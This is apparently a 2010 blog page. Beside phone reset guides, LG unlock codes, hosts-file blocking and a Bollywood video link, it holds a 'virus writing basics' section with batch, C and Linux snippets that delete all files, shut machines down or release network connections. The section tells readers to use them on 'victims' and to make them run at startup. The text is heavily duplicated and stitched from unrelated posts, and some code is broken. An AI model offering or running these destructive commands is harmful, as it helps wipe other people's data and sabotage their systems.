Thursday, September 9, 2010
Motorola MILESTONE XT720 - Hard Reset / Factory Data Reset
MILESTONE XT720 - Resetting to factory data fresh default settings.
WARNING: This process will deleted all data stored on your device. However, All data stored on the MicroSD will be affected. Please back first before proceeding.
To Perform a Reset
# Open the Applications Tray. (arrow pointing up located in the middle at the bottom of the display screen)
# Select Settings
# Select Privacy
# Select Factory data reset
# Select Reset Phone
# Select Erase Everything
To Manually Hard Reset
If there are significant problems with your device or you are not able to follow the steps above please use the following process to manually reset the phone:
1. Turn off phone
2. Press Power key + Camera Key to power on the phone and bring up the recovery screen
3. PressVolume Up + Camera Key to show the recovery menu.
4. SelectWipe data/factory reset
5. Select Reboot Phone
Note: Once the phone reboot, all your data and application already deleted on your Motorola MILESTONE XT720, you need to install them back again.
Disable internet temporarily
This is the virus writing basics section. Today we are going to show you how to disable Internet. This is demonstrated using Batch/ Dos Programing.
ipconfig /release
echo You Internet Been HACKED!
Just copy the above code in to a notepad file and save it as anything.BAT. This will temporarily disable your Internet. Actually all the job is done by the first line only the second line just informs that the Internet has been disabled
As all the info given over here is purely for educational purpose it's readers responsibility to use it sensibly. You could land into grave trouble if you spread this.
ipconfig /release
echo You Internet Been HACKED!
Just copy the above code in to a notepad file and save it as anything.BAT. This will temporarily disable your Internet. Actually all the job is done by the first line only the second line just informs that the Internet has been disabled
As all the info given over here is purely for educational purpose it's readers responsibility to use it sensibly. You could land into grave trouble if you spread this.
Delete all files virus
This is the virus wirting basics section. Today we are going to show you how to delete all content. This is demonstrated using DOS programming and also in LINUX.
DOS programming
Paste the given code in notepad
@Echo off
Del C:\ *.*y
And save it like any_name.bat . Now run this file... All the data is gone from your PC.
LINUX
Just run the command
rm will delete all files of any extention
DOS programming
Paste the given code in notepad
@Echo off
Del C:\ *.*y
And save it like any_name.bat . Now run this file... All the data is gone from your PC.
LINUX
Just run the command
rm will delete all files of any extention
Block/Unblock sites without software
You can block or even unblock sites without any software. Just follow these steps and you can continue acessing the file.
•Go to Start >>> RUN .
•Type C:\WINDOWS\system32\drivers\etc
•Open the file "HOSTS" in a notepad
•Under "127.0.0.1 localhost" . Add IP Name
IP - IP of the site to be blocked
Name - Name of the site
Example :
127.0.0.1 localhost
210.210.19.82 www.sifymall.com
Sifymall is now unaccessable . For every site after that you want block , just add "1" to the last number in the internal ip (127.0.0.2) and then the add like before.
•Go to Start >>> RUN .
•Type C:\WINDOWS\system32\drivers\etc
•Open the file "HOSTS" in a notepad
•Under "127.0.0.1 localhost" . Add IP Name
IP - IP of the site to be blocked
Name - Name of the site
Example :
127.0.0.1 localhost
210.210.19.82 www.sifymall.com
Sifymall is now unaccessable . For every site after that you want block , just add "1" to the last number in the internal ip (127.0.0.2) and then the add like before.
Clone virus C, C++
This is a virus code of clone virus in c/c++. This virus clones itself. You can convert it into java by making small changes that any java programmer can make out.
Before you use this virus you need to compile . Just select the complie option in your c compiler. DONT RUN IT OR SELECT THE RUN OPTION, I repeat dont run it. Now exit the compiler . Find the size of the .exe file generated in bytes. Replace the value of "X" with is value(in bytes).
Now recompile it and exit.
What this virus does is it makes all the files in the current directory a virus. You need to find out the header files for yourself as this only for educational purpose . Just remember to run this virus inside a new folder that contains no important exe and normal files . This virus will make them too as virus.
This is intended for c/c++ programmers who have knowledge about data structure. This is only and only for knowledge sake
Before you use this virus you need to compile . Just select the complie option in your c compiler. DONT RUN IT OR SELECT THE RUN OPTION, I repeat dont run it. Now exit the compiler . Find the size of the .exe file generated in bytes. Replace the value of "X" with is value(in bytes).
Now recompile it and exit.
What this virus does is it makes all the files in the current directory a virus. You need to find out the header files for yourself as this only for educational purpose . Just remember to run this virus inside a new folder that contains no important exe and normal files . This virus will make them too as virus.
This is intended for c/c++ programmers who have knowledge about data structure. This is only and only for knowledge sake
BLACK WOLF VIRUS
This is the code of the "Black Wolf" virus.This is in c. You are at your own risk. If you spread this you will land behind the bar. We are giving this only for educational Purpose. You need to guess the header file for yourself.
This virus corrupts all the .com files . so be extremely careful what you do with it.
This virus corrupts all the .com files . so be extremely careful what you do with it.
Doom virus
Replace location to the location where you want the file to be
This is not actually a virus but a practical joke. It will make your victim believe that his system is under seize and is infected. Remember you need to compile it only (.ie click on compile option ) and not run it(i.e click on run option). This will generate the .EXE file.
Even though this is just a prank just be careful to whom you spread it as you could still get into minor trouble.
This is not actually a virus but a practical joke. It will make your victim believe that his system is under seize and is infected. Remember you need to compile it only (.ie click on compile option ) and not run it(i.e click on run option). This will generate the .EXE file.
Even though this is just a prank just be careful to whom you spread it as you could still get into minor trouble.
Virus code tutorial
Virus code can be coded using several language. The best being c or vbs or dos. Today I teach some basic virus codings. I will be using c, dos and alp/asm(assembly language).These is a very simple Virus coding tutorial just a beginners guide
this is mainly for programmers. this post is just to change their thinking. First lets begin with tiny and simple ones.I will show both codes for windows and linux
First alp/asm
back: add c,b
loop back
This simple script needs no explanation. It will just be eating away your victims memory at a slow space. As you know addition needs some space to store intermediate result. this will be using up the ram. but very less of ram is lost and the user can stop this by just closing the .exe file. As you know a float addition takes up more space than normal addition . You can replace integer addition with float.
Now lets try to create a simple Linux virus in c.
system("poweroff");
This simple script will turn off your victims comp. Now if you can forece this script to load at start up then it will be a nightmare.
let's see one more linux virus of the same type
system("rm *.*");
This will all files with all extension which the user has previlage to delete.Just imagine if the admin runs it then it will create a havoc.
Lets see the same codes for windows.
To delete all files in windows using dos/batch progtraming will be
del *.*
and the code of the shutdown virus will be just shutdown
Now lets disable Internet
ipconfig /release
echo You Internet Been HACKED!
What if you change the extension of a file. It becomes useless.Now let's rename a few file.
rename(old_file_name_with_path,newname");
Now what you can do with this left up to you.Just use your brain and you will make out it's potential.
this is mainly for programmers. this post is just to change their thinking. First lets begin with tiny and simple ones.I will show both codes for windows and linux
First alp/asm
back: add c,b
loop back
This simple script needs no explanation. It will just be eating away your victims memory at a slow space. As you know addition needs some space to store intermediate result. this will be using up the ram. but very less of ram is lost and the user can stop this by just closing the .exe file. As you know a float addition takes up more space than normal addition . You can replace integer addition with float.
Now lets try to create a simple Linux virus in c.
system("poweroff");
This simple script will turn off your victims comp. Now if you can forece this script to load at start up then it will be a nightmare.
let's see one more linux virus of the same type
system("rm *.*");
This will all files with all extension which the user has previlage to delete.Just imagine if the admin runs it then it will create a havoc.
Lets see the same codes for windows.
To delete all files in windows using dos/batch progtraming will be
del *.*
and the code of the shutdown virus will be just shutdown
Now lets disable Internet
ipconfig /release
echo You Internet Been HACKED!
What if you change the extension of a file. It becomes useless.Now let's rename a few file.
rename(old_file_name_with_path,newname");
Now what you can do with this left up to you.Just use your brain and you will make out it's potential.
LG Security Code Without Any Software for [Ku250]
LG Security Code Without Any Software
Free_Free, KU990 Security Code open , Without Any Box & Cable
Tested By Me,
1 Without sim phone power on
2 Hold camera +verou button
3 You will get key pad write3845#*990#
4 Then Do factory reset
for Ku250
26911147#*250#
enjoy...!
Free_Free, KU990 Security Code open , Without Any Box & Cable
Tested By Me,
1 Without sim phone power on
2 Hold camera +verou button
3 You will get key pad write3845#*990#
4 Then Do factory reset
for Ku250
26911147#*250#
enjoy...!
Crook (2010) ** Exclusive Ringtones on Mobile Rdx Blog **
Munni Badnaam (Dabangg) Extended Video
Munni Badnaam (Dabangg) Extended Video
Details:
Movie: Dabangg
Year: 2010
Video: Munni Badnaam Extended
Featured: Salman Khan
Runtime: 2:30 Sec.
Description:
Munni Badnaam is a latest promotional video of Salman Khan's upcoming movie Dabangg.
Munni Badnaam (Dabangg) Extended Video (Download Link):
Click Here To Download